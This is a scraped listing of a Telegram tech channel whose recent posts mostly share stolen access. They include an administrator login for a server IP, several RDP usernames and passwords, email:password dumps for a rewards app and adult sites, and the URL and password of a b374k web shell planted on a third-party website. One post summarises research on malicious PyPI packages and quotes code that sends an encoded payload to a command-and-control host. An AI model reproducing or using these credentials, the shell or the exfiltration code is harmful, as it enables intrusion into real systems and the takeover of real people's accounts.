Get Mystery Box with random crypto!

TECHGIANTS™©

Logo of telegram channel techgiantske — TECHGIANTS™© T
Logo of telegram channel techgiantske — TECHGIANTS™©
Channel address: @techgiantske
Categories: Technologies
Language: English
Subscribers: 9.75K
Description from channel

✅Educative Tutorials
✅Free Internet Tricks
✅Modern smartphone & Computer reviews.
✅ Data Deals Available
♂️For Paid Ads,
= @DailyTrendsAds_bot
♂️Modedapps channel
= @TGStarlabs

Ratings & Reviews

4.00

2 reviews

Reviews can be left only by registered users. All reviews are moderated by admins.

5 stars

0

4 stars

2

3 stars

0

2 stars

0

1 stars

0


The latest Messages 11

2021-12-14 20:45:13 Server -» 129.0.154.28

User -» Administrator

Password -» P@55word

————»More Information«————

Processor -» INTEL XEON E-2224

RAM -» 2GB

CPU -» 3.41Ghz
649 views17:45
Open / Comment
2021-11-24 08:19:36 Researchers have discovered malicious Python packages in PyPI 11 that can steal access tokens, passwords and create backdoors

Security experts at JFrog report finding 11 malicious P ython packages in the Python Package Index (PyPI) repository, apparently designed to steal access tokens to platforms such as Discord, in addition to hijacking passwords and deploying dependency confusion attacks.

The list of malicious packages detected during the study is presented below:

importantpackage / important-package
pptest
ipboards
owlmoon
DiscordSafety
trrfab
10Cent10 / 10Cent11
yandex-yt
yiffparty

Among these packages, experts point out that "importantpackage", "10Cent10" and "10Cent11" seem to create an inverse layer on the compromised machine. In addition, "importantpackage" abuses TLS CDN termination to steal data in addition to using Fastly CDN to hide malicious communication with the C&C server.

url = “https://pypi.python.org” + “/ images” + “?” + “Guid =” + b64_payload
r = request.Request (url, headers = {‘Host’: “psec.forward.io.global.prod.fastly.net”})


Researchers note that this code causes an HTTPS request to be sent to pypi.python.org, which is then redirected by the CDN as an HTTP request to the C2 server psec.forward.io.global.prod.fastly.net.

The dependency confusion technique involves downloading infected components that have the same name as legitimate internal private packages but with a higher version and are uploaded to the public repositories. This method is really good for tricking package managers into downloading and installing malicious modules.

In conclusion, the researchers noted that while this attack is similar to other hacking methods, it gives attackers the ability to act stealthily and can also serve as a prelude to subsequent attacks.
750 views05:19
Open / Comment
2021-11-23 09:57:44 Microsoft excel complete course

https://drive.google.com/drive/mobile/folders/1QhCXMldljQWHPNErMYICU-yQ7ngyr0OY?usp=sharing
131 views06:57
Open / Comment
2021-11-13 09:54:56 HTTP Shell

http://pansverigeab.se/index.php
PW : b374k
1.2K views06:54
Open / Comment
2021-11-13 09:54:30 Aiseesoft Data Recovery (1 Year) protected

https://www.aiseesoft.de/tutorial/txt-datei-wiederherstellen/
https://www.aiseesoft.de/support/excel-datei-wiederherstellen/
1.2K views06:54
Open / Comment
2021-11-13 09:54:00 Coinapp.co with Points, Try Redeeming

corominasha@gmail.com:8821coro | Coins: = 18298.64 | Redeemed: = 0
arev28@gmail.com:Devonn31 | Coins: = 17168.7299999999 | Redeemed: = 0
ddaydude@gmail.com:hockey12 | Coins: = 12601.06 | Redeemed: = 0
joshbanks96@me.com:joshtaZZy12 | Coins: = 39001.7699999996 | Redeemed: = 10000
kenneth_woolf@yahoo.com:Xfx27h2q | Coins: = 11901.7400000004 | Redeemed: = 0
1.1K views06:54
Open / Comment
2021-11-13 09:53:23 TRIAL RDPs
Send Screenshots after claiming
» CPU Cores: 4
» Disk Space: 100 GB
» RAM: 1.5 GB
» Internet Speed: 200 MBs

RDP IP: 45.77.201.14
Username: User8786
Password: jl0jaW0q

========================
RDP IP: 45.77.201.14
Username: User3285
Password: Hwx5GfSf

=======================
RDP IP: 45.77.201.14
Username: User4554
Password: 2SRmAmwO

========================
RDP IP: 45.77.201.14
Username: User8350
Password: nyrm7PWr
988 views06:53
Open / Comment
2021-11-12 17:30:43 x5 Beauty-Angels

maurofrai:gaetano
jbeaming:NCC1701d
jazzpopp:tkmaxx12
dcjorico:13121415Aa
ecg49ers:49ersecg
1.1K views14:30
Open / Comment
2021-11-12 17:29:25 x1 PovInvasion

18+ Content

petermax:messi10
1.0K views14:29
Open / Comment
2021-11-12 17:29:01 x1 PublicBanging

18+ Content

kamoona:Eoomkl9m
1.0K views14:29
Open / Comment